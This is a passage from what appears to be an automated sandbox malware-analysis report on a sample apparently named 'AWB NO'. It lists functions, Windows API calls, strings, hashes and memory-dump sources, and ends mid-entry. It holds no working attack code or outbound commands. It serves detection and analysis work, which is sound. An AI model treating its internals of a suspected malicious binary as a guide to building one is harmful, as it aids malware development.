                                                              • Instruction ID: 34a51bb5a318ae1a344add4034b802b2dd09297663e35ec0c622bb09f95dc302
                                                              • Opcode Fuzzy Hash: 463adb09294f08f2b550a3aac66e477959837ac27b60c120b9cefca0ac7b2281
                                                              • Instruction Fuzzy Hash: 21B18275600205AFDB14DF68DD89BAE7BB4FB08314F10863AFA15A72D0DB78A851CF58
                                                              Function 00484069 Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CharUpperBuffW.USER32(?,?), ref: 004840F6
                                                              • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 004841B6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: BuffCharMessageSendUpper
                                                              • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                              • API String ID: 3974292440-719923060
                                                              • Opcode ID: 30b7a13a9b945c188d0a3043487b290925185cafffcbe215eba7ed58fcd6356b
                                                              • Instruction ID: 9cfe7e01c3492d2b59db2ff75b6cf7b0990ad6aaadf579f18c9153eeadefeee6
                                                              • Opcode Fuzzy Hash: 30b7a13a9b945c188d0a3043487b290925185cafffcbe215eba7ed58fcd6356b
                                                              • Instruction Fuzzy Hash: DDA170303142029FCB14FF15C951A6EB3A5AF84318F14496EB8965B3D3DB38ED06CB5A
                                                              Function 004752F0 Relevance: 27.1, APIs: 18, Instructions: 124COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadCursorW.USER32(00000000,00007F89), ref: 00475309
                                                              • LoadCursorW.USER32(00000000,00007F8A), ref: 00475314
                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 0047531F
                                                              • LoadCursorW.USER32(00000000,00007F03), ref: 0047532A
                                                              • LoadCursorW.USER32(00000000,00007F8B), ref: 00475335
                                                              • LoadCursorW.USER32(00000000,00007F01), ref: 00475340
                                                              • LoadCursorW.USER32(00000000,00007F81), ref: 0047534B
                                                              • LoadCursorW.USER32(00000000,00007F88), ref: 00475356
                                                              • LoadCursorW.USER32(00000000,00007F80), ref: 00475361
                                                              • LoadCursorW.USER32(00000000,00007F86), ref: 0047536C
                                                              • LoadCursorW.USER32(00000000,00007F83), ref: 00475377
                                                              • LoadCursorW.USER32(00000000,00007F85), ref: 00475382
                                                              • LoadCursorW.USER32(00000000,00007F82), ref: 0047538D
                                                              • LoadCursorW.USER32(00000000,00007F84), ref: 00475398
                                                              • LoadCursorW.USER32(00000000,00007F04), ref: 004753A3
                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 004753AE
                                                              • GetCursorInfo.USER32(?), ref: 004753BE
                                                              • GetLastError.KERNEL32(00000001,00000000), ref: 004753E9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Cursor$Load$ErrorInfoLast
                                                              • String ID:
                                                              • API String ID: 3215588206-0
                                                              • Opcode ID: 6a6270ed0b4940824aeabb991483fe1258c9c8061cdaf7958afd48eb47f7a711
                                                              • Instruction ID: 895aef13bd3dab5c61d690930f62dfa726266ed77347b80580808b7c2f00316e
                                                              • Opcode Fuzzy Hash: 6a6270ed0b4940824aeabb991483fe1258c9c8061cdaf7958afd48eb47f7a711
                                                              • Instruction Fuzzy Hash: 64415370E043196ADB109FBA8C499AFFFF8EF51B50B10453FA509EB291DAB894018E55
                                                              Function 0045C4C1 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadIconW.USER32(00000063), ref: 0045C4D4
                                                              • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045C4E6
                                                              • SetWindowTextW.USER32(?,?), ref: 0045C4FD
                                                              • GetDlgItem.USER32(?,000003EA), ref: 0045C512
                                                              • SetWindowTextW.USER32(00000000,?), ref: 0045C518
                                                              • GetDlgItem.USER32(?,000003E9), ref: 0045C528
                                                              • SetWindowTextW.USER32(00000000,?), ref: 0045C52E
                                                              • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0045C54F
                                                              • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0045C569
                                                              • GetWindowRect.USER32(?,?), ref: 0045C572
                                                              • SetWindowTextW.USER32(?,?), ref: 0045C5DD
                                                              • GetDesktopWindow.USER32 ref: 0045C5E3
                                                              • GetWindowRect.USER32(00000000), ref: 0045C5EA
                                                              • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0045C636
                                                              • GetClientRect.USER32(?,?), ref: 0045C643
                                                              • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0045C668
                                                              • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0045C693
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                              • String ID:
                                                              • API String ID: 3869813825-0
                                                              • Opcode ID: e87f013716cb66209e1fdc9be48e700506287b43d24e7040997972545f066d81
                                                              • Instruction ID: 3b2bd1e7a7ebd211801f78b3086a02ec173cefa662ab0dc5f88ee9ae4e850772
                                                              • Opcode Fuzzy Hash: e87f013716cb66209e1fdc9be48e700506287b43d24e7040997972545f066d81
                                                              • Instruction Fuzzy Hash: 1F518070900709AFDB20DFA8CD85B6FBBF5FF04705F00492DE682A26A1D774A949CB54
                                                              Function 0048C8EE Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 181windowfileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                              • DragQueryPoint.SHELL32(?,?), ref: 0048C917
                                                                • Part of subcall function 0048ADF1: ClientToScreen.USER32(?,?), ref: 0048AE1A
                                                                • Part of subcall function 0048ADF1: GetWindowRect.USER32(?,?), ref: 0048AE90
                                                                • Part of subcall function 0048ADF1: PtInRect.USER32(?,?,0048C304), ref: 0048AEA0
                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 0048C980
                                                              • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0048C98B
                                                              • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0048C9AE
                                                              • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0048C9F5
                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 0048CA0E
                                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 0048CA25
                                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 0048CA47
                                                              • DragFinish.SHELL32(?), ref: 0048CA4E
                                                              • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0048CB41
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                              • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$prL
                                                              • API String ID: 221274066-2894286323
                                                              • Opcode ID: d0e734f8bc4af10141359df723f003250e68afa15a89e3e1243172bffb465fbe
                                                              • Instruction ID: 9d54b60ae23129ec17e3264f3c4c669362dbaaf1ee08fbcc713ae4d442fb7e93
                                                              • Opcode Fuzzy Hash: d0e734f8bc4af10141359df723f003250e68afa15a89e3e1243172bffb465fbe
                                                              • Instruction Fuzzy Hash: B6617F71108301AFC701EF65DC85D9FBBF8EF88714F500A2EF591A21A1DB749A49CB6A
                                                              Function 00484619 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CharUpperBuffW.USER32(?,?), ref: 004846AB
                                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 004846F6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: BuffCharMessageSendUpper
                                                              • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                              • API String ID: 3974292440-4258414348
                                                              • Opcode ID: a101b73c2f75f03c977d0f9bd74546b52b8b14f2b6a66f94324df33cf61ca14b
                                                              • Instruction ID: a6b8fb82e4ceb85ef300ce259a46dfdb45366ccd12162413b511f73bb29c4b6b
                                                              • Opcode Fuzzy Hash: a101b73c2f75f03c977d0f9bd74546b52b8b14f2b6a66f94324df33cf61ca14b
                                                              • Instruction Fuzzy Hash: 5E9152742143129FCB14FF15C451A6EB7A1AF84318F00486EE8956B793DB3CED4ACB9A
                                                              Function 0048A428 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 205windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • DestroyWindow.USER32(?,?), ref: 0048A542
                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0048A5BC
                                                              • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0048A5DE
                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0048A5F1
                                                              • DestroyWindow.USER32(00000000), ref: 0048A613
                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0048A64A
                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0048A663
                                                              • GetDesktopWindow.USER32 ref: 0048A67C
                                                              • GetWindowRect.USER32(00000000), ref: 0048A683
                                                              • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0048A69B
                                                              • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0048A6B3
                                                                • Part of subcall function 004025DB: GetWindowLongW.USER32(?,000000EB), ref: 004025EC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect
                                                              • String ID: 0$tooltips_class32
                                                              • API String ID: 1652260434-3619404913
                                                              • Opcode ID: ba74acf88bc8afc12da4d1a0b4acd557f342eae14ade622755994d8a017ce3c8
                                                              • Instruction ID: 86a82787039558be905cb5ee93fd95c55d710ea48d453bde977e80527a28d278
                                                              • Opcode Fuzzy Hash: ba74acf88bc8afc12da4d1a0b4acd557f342eae14ade622755994d8a017ce3c8
                                                              • Instruction Fuzzy Hash: 14717171140205AFE710EF18CC45F6B77E5FB88304F08492EF985972A0D7B8E956CB6A
                                                              Function 0048BAB8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0048BB6E
                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00489431), ref: 0048BBCA
                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0048BC03
                                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0048BC46
                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0048BC7D
                                                              • FreeLibrary.KERNEL32(?), ref: 0048BC89
                                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0048BC99
                                                              • DestroyIcon.USER32(?,?,?,?,?,00489431), ref: 0048BCA8
                                                              • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0048BCC5
                                                              • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0048BCD1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree
                                                              • String ID: .dll$.exe$.icl
                                                              • API String ID: 1446636887-1154884017
                                                              • Opcode ID: 37424d4d7763948733a8dca49077fd2f9633061e04095cbabdff28e088f3a0fe
                                                              • Instruction ID: 5370879412d3ef42147b43b34bb4041711e9c26008a93505a4a8dcab61b4cfc6
                                                              • Opcode Fuzzy Hash: 37424d4d7763948733a8dca49077fd2f9633061e04095cbabdff28e088f3a0fe
                                                              • Instruction Fuzzy Hash: E661CE71600219BEEB14EF65CC45BBF77A8EB08710F10492EF815D61C1DBB8A994DBA8
                                                              Function 0046A5BD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CharLowerBuffW.USER32(?,?), ref: 0046A636
                                                              • GetDriveTypeW.KERNEL32 ref: 0046A683
                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046A6CB
                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046A702
                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046A730
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: SendString$BuffCharDriveLowerType
                                                              • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                              • API String ID: 1600147383-4113822522
                                                              • Opcode ID: 946188dde1d9c215ad57ce0c356ac964412de47c7a0f2ef33d30d7c056bd663b
                                                              • Instruction ID: 6be42100393f5907e158319192f1f81eb493a356fa9d8496d4bade02da62f26d
                                                              • Opcode Fuzzy Hash: 946188dde1d9c215ad57ce0c356ac964412de47c7a0f2ef33d30d7c056bd663b
                                                              • Instruction Fuzzy Hash: 74516AB12043049FC700EF25C88196AB3E4EF94308F14496EF885672A2DB39EE0ACF56
                                                              Function 0047762D Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDC.USER32(00000000), ref: 004776A2
                                                              • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 004776AE
                                                              • CreateCompatibleDC.GDI32(?), ref: 004776BA
                                                              • SelectObject.GDI32(00000000,?), ref: 004776C7
                                                              • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 0047771B
                                                              • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00477757
                                                              • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 0047777B
                                                              • SelectObject.GDI32(00000006,?), ref: 00477783
                                                              • DeleteObject.GDI32(?), ref: 0047778C
                                                              • DeleteDC.GDI32(00000006), ref: 00477793
                                                              • ReleaseDC.USER32(00000000,?), ref: 0047779E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                              • String ID: (
                                                              • API String ID: 2598888154-3887548279
                                                              • Opcode ID: 933ace60e19415b5136d2c61b858a78281b90340d02f08f7ce8c0e2b82895f36
                                                              • Instruction ID: 35a76c6371ee925a40e749d113c81bfe70045e9a1f5769368c195ea94eb780e8
                                                              • Opcode Fuzzy Hash: 933ace60e19415b5136d2c61b858a78281b90340d02f08f7ce8c0e2b82895f36
                                                              • Instruction Fuzzy Hash: B2514A75904209EFCB15CFA8CC84EAEBBB9EF49310F14892EF949A7210D735A845CB64
                                                              Function 004583F4 Relevance: 19.7, APIs: 13, Instructions: 179memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0045874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00458766
                                                                • Part of subcall function 0045874A: GetLastError.KERNEL32(?,0045822A,?,?,?), ref: 00458770
                                                                • Part of subcall function 0045874A: GetProcessHeap.KERNEL32(00000008,?,?,0045822A,?,?,?), ref: 0045877F
                                                                • Part of subcall function 0045874A: HeapAlloc.KERNEL32(00000000,?,0045822A,?,?,?), ref: 00458786
                                                                • Part of subcall function 0045874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0045879D
                                                                • Part of subcall function 004587E7: GetProcessHeap.KERNEL32(00000008,00458240,00000000,00000000,?,00458240,?), ref: 004587F3
                                                                • Part of subcall function 004587E7: HeapAlloc.KERNEL32(00000000,?,00458240,?), ref: 004587FA
                                                                • Part of subcall function 004587E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00458240,?), ref: 0045880B
                                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00458458
                                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0045848C
                                                              • GetLengthSid.ADVAPI32(?), ref: 0045849D
                                                              • GetAce.ADVAPI32(?,00000000,?), ref: 004584DA
                                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 004584F6
                                                              • GetLengthSid.ADVAPI32(?), ref: 00458513
                                                              • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00458522
                                                              • HeapAlloc.KERNEL32(00000000), ref: 00458529
                                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0045854A
                                                              • CopySid.ADVAPI32(00000000), ref: 00458551
                                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00458582
                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004585A8
                                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004585BC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast
                                                              • String ID:
                                                              • API String ID: 1795222879-0
                                                              • Opcode ID: 627c0861b54cffdfc9a529a4ed73b197297eeeab106a519f0bcebb365129c94a
                                                              • Instruction ID: e0118614a4d337cb82eb8ed29ac7d5de28cd502eb863139baceb9309d046dcf4
                                                              • Opcode Fuzzy Hash: 627c0861b54cffdfc9a529a4ed73b197297eeeab106a519f0bcebb365129c94a
                                                              • Instruction Fuzzy Hash: D5614971900209BFDF009FA1DC45AAEBBB9FF05305B14856EE815B6292EF359A09CB64
                                                              Function 00478BC0 Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 324fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • VariantInit.OLEAUT32(?), ref: 00478BEC
                                                              • CoInitialize.OLE32(00000000), ref: 00478C19
                                                              • CoUninitialize.OLE32 ref: 00478C23
                                                              • GetRunningObjectTable.OLE32(00000000,?), ref: 00478D23
                                                              • SetErrorMode.KERNEL32(00000001,00000029), ref: 00478E50
                                                              • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00492C0C), ref: 00478E84
                                                              • CoGetObject.OLE32(?,00000000,00492C0C,?), ref: 00478EA7
                                                              • SetErrorMode.KERNEL32(00000000), ref: 00478EBA
                                                              • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00478F3A
                                                              • VariantClear.OLEAUT32(?), ref: 00478F4A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                              • String ID: ,,I
                                                              • API String ID: 2395222682-4163367948
                                                              • Opcode ID: a4fa72b6251a261673152e8d551cfcfce9f93389bfa5b197c4d2fb87e7c213e2
                                                              • Instruction ID: 22c5d904e23ad896e3453865a061727a73fd10ed6b7a79d4550a4018499a7712
                                                              • Opcode Fuzzy Hash: a4fa72b6251a261673152e8d551cfcfce9f93389bfa5b197c4d2fb87e7c213e2
                                                              • Instruction Fuzzy Hash: 30C134B1608305AFC700EF25C88896BB7E9BF88348F00896EF589DB251DB75ED05CB56
                                                              Function 0048C49C Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 229windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                              • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0048C4EC
                                                              • GetFocus.USER32 ref: 0048C4FC
                                                              • GetDlgCtrlID.USER32(00000000), ref: 0048C507
                                                              • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0048C65D
                                                              • GetMenuItemCount.USER32(?), ref: 0048C67D
                                                              • GetMenuItemID.USER32(?,00000000), ref: 0048C690
                                                              • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0048C6C4
                                                              • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0048C70C
                                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0048C744
                                                              • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0048C779
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
